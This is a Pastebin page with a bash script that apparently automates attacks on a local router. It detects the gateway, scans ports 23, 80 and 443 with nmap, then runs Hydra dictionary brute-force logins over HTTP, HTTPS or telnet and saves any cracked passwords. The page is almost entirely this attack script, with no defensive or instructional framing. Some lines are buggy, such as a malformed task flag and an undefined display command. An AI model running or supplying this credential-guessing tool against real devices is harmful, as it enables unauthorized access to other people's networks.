Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #/bin/bash
- version="0.1"
- passwords=/root/passwords.lst # Where to store found passwords
- username=/root/Hydra/user.lst # User list path
- dictpath=/root/Hydra/pass.lst # Password list path
- tasks=15 # Hydra tasks
- logfile=/tmp/hydra/logfile.lst # Will be adding to this for verbosity
- scanresults=/tmp/hydra/scanresults.lst # Temp nmap scan output
- temp=/tmp/hydra # Temp folder
- #-- Nothing to change below this line ---------------------------------------------------------------
- #__ Check if Root __________________________________________________________
- if [ "$(id -u)" != "0" ] ; then echo "You must be root to use Rout the Router" ; exit 1 ; fi
- #-- Checking if programs are installed --------------------------------------------------------------
- if [ ! -e "/usr/bin/nmap" ] ; then
- echo "Nmap is not installed."
- read -p ">> Would you like to try and install it? [Y/n]: " -n 1
- if [[ "$REPLY" =~ ^[Yy]$ ]] ; then apt-get -y install nmap ; fi
- if [ ! -e "/usr/share/nmap/nmap-services" ] ; then
- echo "Failed to install Nmap"
- else
- display info "Installed: Nmap"
- fi
- fi
- if [ ! -e "/usr/bin/hydra" ] ; then
- echo "Hydra is not installed."
- read -p ">> Would you like to try and install it? [Y/n]: " -n 1
- if [[ "$REPLY" =~ ^[Yy]$ ]] ; then apt-get -y install hydra ; fi
- if [ ! -e "/usr/bin/hydra" ] ; then
- echo "Failed to install Hydra"
- else
- display info "Installed: Hydra"
- fi
- fi
- echo "Nmap and Hydra are installed"
- #-- Verifying ---------------------------------------------------------------------------------------
- if [ ! -e "$username" ] ; then
- echo "Username path not specified" ;
- exit 1
- fi
- if [ ! -e "$dictpath" ] ; then
- echo "Dictionary path not specified" ;
- exit 1
- fi
- if [ ! -d $temp ] ; then mkdir /tmp/hydra/ 2>/dev/null ; fi
- IP=$(ip route | grep default | awk '{ print $3}') # Gives us The Gateway IP address
- http=""
- https=""
- echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
- echo "Finding Alive Hosts and Scanning them"
- echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
- nmap -p 23,80,443 -oG $temp/scanresults.lst $IP | grep "MAC" >> $temp/routerinfo.lst # Nmap scan
- http=$(grep '80/open' $scanresults | awk '{ print $2}')
- if [ "$http" == "$IP" ] ; then http="true" ; fi
- https=$(grep '443/open' $scanresults | awk '{ print $2}')
- if [ "$https" == "$IP" ] && [ "$http" != "true" ] ; then https="true" ; fi # We don't want to attack 443 if we can get 80
- telnet=$(grep '23/open' $scanresults | awk '{ print $2}')
- if [ "$telnet" == "$IP" ] ; then telnet="true" ; fi
- # -- Brand customization -----------------------------------------------------------------
- brand=$(awk '{ print $4 }' $temp/routerinfo.lst)
- if [ $brand == "(Cisco-Linksys)" ] ; then
- echo "admin
- user" > $temp/linksys.lst
- username="$temp/linksys.lst"
- fi
- if [ $http == "true" ] ; then
- echo "<<<<<<<<<>>>>>>>>>>>"
- echo "Attacking on Port 80"
- echo "<<<<<<<<<>>>>>>>>>>>"
- hydra -L $username -P $dictpath -e n -e s -t n$tasks -f -w 15 -v $IP http-get / -o $temp/http.lst
- cat $temp/http.lst | grep "passwords:" >> $passwords
- pass=$(grep "password:" $passwords | awk '{ print $4}') >/dev/null
- if [ "$pass" == "" ] ; then https="true" ; fi
- fi
- if [ $https == "true" ] ; then
- echo "<<<<<<<<<<>>>>>>>>>>>"
- echo "Attacking on Port 443"
- echo "<<<<<<<<<<>>>>>>>>>>>"
- hydra -L $username -P $dictpath -S -e n -e s -t $tasks -f -w 15 -v $IP https-get / -o $temp/https.lst
- cat $temp/https.lst | grep "passwords:" >> $passwords
- fi
- if [ "$telnet" == "true" ] ; then
- echo "<<<<<<<<<<>>>>>>>>>>"
- echo "Attacking on Port 23"
- echo "<<<<<<<<<<>>>>>>>>>>"
- hydra -L $username -P $dictpath -e n -e s -t $tasks -f -w 15 -v $IP telnet / -o $temp/telnet.lst
- cat $temp/telnet.lst | grep "passwords:" >> $passwords
- fi
- # Cleanup
- clear
- echo date >> $passwords
- cat $passwords
- rm -rf /$temp/routerinfo.lst
- rm -rf $scanresults
- rm -rf $temp/http.lst
- rm -rf $temp/https.lst
- rm -rf $passwords # Remove this for release version
- exit 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement